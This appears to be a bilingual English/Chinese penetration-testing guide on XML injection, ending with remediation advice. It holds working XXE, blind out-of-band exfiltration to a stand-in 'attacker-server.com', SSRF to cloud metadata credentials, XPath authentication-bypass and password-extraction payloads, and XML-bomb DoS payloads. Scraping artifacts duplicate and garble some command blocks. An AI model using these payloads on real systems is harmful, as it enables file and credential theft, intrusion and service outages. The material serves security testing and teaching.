testing-for-xml-injection-vulnerabilities
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChineseTesting for XML Injection Vulnerabilities
XML注入漏洞测试
When to Use
适用场景
- When testing applications that process XML input (SOAP APIs, XML-RPC, file uploads)
- During penetration testing of applications with XML parsers
- When assessing SAML-based authentication implementations
- When testing file import/export functionality that handles XML formats
- During API security testing of SOAP or XML-based web services
- 测试处理XML输入的应用程序(SOAP API、XML-RPC、文件上传功能)
- 对带有XML解析器的应用程序进行渗透测试时
- 评估基于SAML的身份验证实现时
- 测试处理XML格式的文件导入/导出功能时
- 对SOAP或基于XML的Web服务进行API安全测试时
Prerequisites
前置条件
- Burp Suite with XML-related extensions (Content Type Converter, XXE Scanner)
- XMLLint or similar XML validation tools
- Understanding of XML structure, DTDs, and entity processing
- Python 3.x with lxml and requests libraries
- Access to an out-of-band interaction server (Burp Collaborator, interact.sh)
- Sample XXE payloads from PayloadsAllTheThings repository
- 安装了XML相关扩展(Content Type Converter、XXE Scanner)的Burp Suite
- XMLLint或类似的XML验证工具
- 了解XML结构、DTD和实体处理机制
- 安装了lxml和requests库的Python 3.x环境
- 可访问带外交互服务器(Burp Collaborator、interact.sh)
- 来自PayloadsAllTheThings仓库的XXE示例载荷
Workflow
测试流程
Step 1 — Identify XML Processing Endpoints
步骤1 — 识别XML处理端点
bash
undefinedbash
undefinedLook for endpoints accepting XML content types
寻找接受XML内容类型的端点
Content-Type: application/xml, text/xml, application/soap+xml
Content-Type: application/xml, text/xml, application/soap+xml
Check WSDL files for SOAP services
检查WSDL文件以寻找SOAP服务
curl -s http://target.com/service?wsdl
curl -s http://target.com/service?wsdl
Test if endpoint accepts XML by changing Content-Type
通过修改Content-Type测试端点是否接受XML
curl -X POST http://target.com/api/data
-H "Content-Type: application/xml"
-d '<?xml version="1.0"?><root><test>hello</test></root>'
-H "Content-Type: application/xml"
-d '<?xml version="1.0"?><root><test>hello</test></root>'
curl -X POST http://target.com/api/data
-H "Content-Type: application/xml"
-d '<?xml version="1.0"?><root><test>hello</test></root>'
-H "Content-Type: application/xml"
-d '<?xml version="1.0"?><root><test>hello</test></root>'
Check for XML file upload functionality
检查XML文件上传功能
Look for .xml, .svg, .xlsx, .docx file processing
寻找处理.xml、.svg、.xlsx、.docx文件的功能
undefinedundefinedStep 2 — Test for Basic XXE (File Retrieval)
步骤2 — 测试基础XXE(文件读取)
xml
<!-- Basic XXE to read local files -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>
<!-- Windows file retrieval -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
]>
<root><data>&xxe;</data></root>
<!-- Using PHP wrapper for base64-encoded file content -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<root><data>&xxe;</data></root>xml
<!-- 读取本地文件的基础XXE载荷 -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>
<!-- Windows文件读取载荷 -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
]>
<root><data>&xxe;</data></root>
<!-- 使用PHP包装器获取base64编码的文件内容 -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<root><data>&xxe;</data></root>Step 3 — Test for Blind XXE with Out-of-Band Detection
步骤3 — 测试带外检测的盲XXE
xml
<!-- Out-of-band XXE using external DTD -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker-server.com/xxe.dtd">
%xxe;
]>
<root><data>test</data></root>
<!-- External DTD file (xxe.dtd hosted on attacker server) -->
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker-server.com/?data=%file;'>">
%eval;
%exfil;
<!-- DNS-based out-of-band detection -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://xxe-test.burpcollaborator.net">
]>
<root><data>&xxe;</data></root>xml
<!-- 使用外部DTD的带外XXE载荷 -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker-server.com/xxe.dtd">
%xxe;
]>
<root><data>test</data></root>
<!-- 攻击者服务器上托管的外部DTD文件(xxe.dtd) -->
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker-server.com/?data=%file;'>">
%eval;
%exfil;
<!-- 基于DNS的带外检测载荷 -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://xxe-test.burpcollaborator.net">
]>
<root><data>&xxe;</data></root>Step 4 — Test for SSRF via XXE
步骤4 — 测试通过XXE实现的SSRF
xml
<!-- Internal network scanning via XXE -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root><data>&xxe;</data></root>
<!-- AWS metadata endpoint access -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&xxe;</data></root>
<!-- Internal port scanning -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://internal-server:8080/">
]>
<root><data>&xxe;</data></root>xml
<!-- 通过XXE进行内部网络扫描 -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root><data>&xxe;</data></root>
<!-- 访问AWS元数据端点 -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&xxe;</data></root>
<!-- 内部端口扫描 -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://internal-server:8080/">
]>
<root><data>&xxe;</data></root>Step 5 — Test for XPath Injection
步骤5 — 测试XPath注入
bash
undefinedbash
undefinedBasic XPath injection in search parameters
搜索参数中的基础XPath注入
curl "http://target.com/search?query=' or '1'='1"
curl "http://target.com/search?query=' or '1'='1"
XPath authentication bypass
XPath身份验证绕过
curl -X POST http://target.com/login
-d "username=' or '1'='1&password=' or '1'='1"
-d "username=' or '1'='1&password=' or '1'='1"
curl -X POST http://target.com/login
-d "username=' or '1'='1&password=' or '1'='1"
-d "username=' or '1'='1&password=' or '1'='1"
XPath data extraction
XPath数据提取
curl "http://target.com/search?query=' or 1=1 or ''='"
curl "http://target.com/search?query=' or 1=1 or ''='"
Blind XPath injection with boolean-based extraction
基于布尔值提取的盲XPath注入
curl "http://target.com/search?query=' or string-length(//user[1]/password)=8 or ''='"
curl "http://target.com/search?query=' or substring(//user[1]/password,1,1)='a' or ''='"
undefinedcurl "http://target.com/search?query=' or string-length(//user[1]/password)=8 or ''='"
curl "http://target.com/search?query=' or substring(//user[1]/password,1,1)='a' or ''='"
undefinedStep 6 — Test for XML Billion Laughs (DoS)
步骤6 — 测试XML十亿笑攻击(DoS)
xml
<!-- Billion Laughs attack (use only in authorized testing) -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<root><data>&lol4;</data></root>
<!-- Quadratic blowup attack -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY a "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
]>
<root>&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;</root>xml
<!-- 十亿笑攻击(仅在授权测试中使用) -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<root><data>&lol4;</data></root>
<!-- 二次爆炸攻击 -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY a "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
]>
<root>&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;</root>Key Concepts
核心概念
| Concept | Description |
|---|---|
| XXE (XML External Entity) | Attack exploiting XML parsers that process external entity references |
| Blind XXE | XXE where response is not reflected; requires out-of-band channels |
| XPath Injection | Injection into XPath queries used to navigate XML documents |
| DTD (Document Type Definition) | Declarations that define XML document structure and entities |
| Parameter Entities | Special entities (%) used within DTDs for blind XXE exploitation |
| SSRF via XXE | Using XXE to make server-side requests to internal resources |
| XML Bomb | Denial of service via recursive entity expansion (Billion Laughs) |
| 概念 | 描述 |
|---|---|
| XXE (XML External Entity) | XXE(XML外部实体):利用处理外部实体引用的XML解析器发起的攻击 |
| Blind XXE | 盲XXE:响应不会直接回显的XXE,需要通过带外通道检测 |
| XPath Injection | XPath注入:注入到用于导航XML文档的XPath查询中的攻击 |
| DTD (Document Type Definition) | DTD(文档类型定义):定义XML文档结构和实体的声明 |
| Parameter Entities | 参数实体:在DTD中用于盲XXE利用的特殊实体(%) |
| SSRF via XXE | 通过XXE实现的SSRF:利用XXE向内部资源发起服务器端请求 |
| XML Bomb | XML炸弹:通过递归实体扩展实现的拒绝服务攻击(十亿笑攻击) |
Tools & Systems
工具与系统
| Tool | Purpose |
|---|---|
| Burp Suite | HTTP proxy with XXE Scanner extension for automated detection |
| XXEinjector | Automated XXE injection and data exfiltration tool |
| OXML_XXE | Tool for embedding XXE payloads in Office XML documents |
| xmllint | XML validation and parsing utility for payload testing |
| interact.sh | Out-of-band interaction server for blind XXE detection |
| Content Type Converter | Burp extension to convert JSON requests to XML for XXE testing |
| 工具 | 用途 |
|---|---|
| Burp Suite | 带有XXE Scanner扩展的HTTP代理,用于自动化检测 |
| XXEinjector | 自动化XXE注入和数据窃取工具 |
| OXML_XXE | 用于在Office XML文档中嵌入XXE载荷的工具 |
| xmllint | 用于载荷测试的XML验证和解析工具 |
| interact.sh | 用于盲XXE检测的带外交互服务器 |
| Content Type Converter | Burp扩展,用于将JSON请求转换为XML以进行XXE测试 |
Common Scenarios
常见场景
- File Disclosure — Read sensitive server files (/etc/passwd, web.config) through classic XXE entity injection in XML input fields
- SSRF to Cloud Metadata — Access AWS/GCP/Azure metadata endpoints through XXE to steal IAM credentials and access tokens
- Blind Data Exfiltration — Extract sensitive data through out-of-band DNS/HTTP channels when XXE output is not reflected
- SAML XXE — Inject XXE payloads into SAML assertions during single sign-on authentication flows
- SVG File Upload XXE — Upload malicious SVG files containing XXE payloads to trigger server-side XML parsing
- 文件泄露 — 通过XML输入字段中的经典XXE实体注入读取服务器敏感文件(/etc/passwd、web.config)
- 通过SSRF访问云元数据 — 通过XXE访问AWS/GCP/Azure元数据端点,窃取IAM凭证和访问令牌
- 盲数据窃取 — 当XXE输出无法回显时,通过带外DNS/HTTP通道提取敏感数据
- SAML XXE — 在单点登录认证流程中,将XXE载荷注入SAML断言
- SVG文件上传XXE — 上传包含XXE载荷的恶意SVG文件,触发服务器端XML解析
Output Format
输出格式
undefinedundefinedXML Injection Assessment Report
XML注入评估报告
- Target: http://target.com/api/xml-endpoint
- Vulnerability Types Found: XXE, Blind XXE, XPath Injection
- Severity: Critical
- 目标: http://target.com/api/xml-endpoint
- 发现的漏洞类型: XXE、盲XXE、XPath注入
- 严重程度: 高危
Findings
检测结果
| # | Type | Endpoint | Payload | Impact |
|---|---|---|---|---|
| 1 | XXE File Read | POST /api/import | SYSTEM "file:///etc/passwd" | Local File Disclosure |
| 2 | Blind XXE | POST /api/upload | External DTD with OOB | Data Exfiltration |
| 3 | SSRF via XXE | POST /api/parse | SYSTEM "http://169.254.169.254/" | Cloud Credential Theft |
| # | 类型 | 端点 | 载荷 | 影响 |
|---|---|---|---|---|
| 1 | XXE文件读取 | POST /api/import | SYSTEM "file:///etc/passwd" | 本地文件泄露 |
| 2 | 盲XXE | POST /api/upload | 带外外部DTD | 数据窃取 |
| 3 | 通过XXE实现的SSRF | POST /api/parse | SYSTEM "http://169.254.169.254/" | 云凭证窃取 |
Remediation
修复建议
- Disable external entity processing in XML parser configuration
- Use JSON instead of XML where possible
- Implement XML schema validation with strict DTD restrictions
- Block outbound connections from XML processing services
undefined- 在XML解析器配置中禁用外部实体处理
- 尽可能使用JSON替代XML
- 实现带有严格DTD限制的XML Schema验证
- 阻止XML处理服务发起出站连接
undefined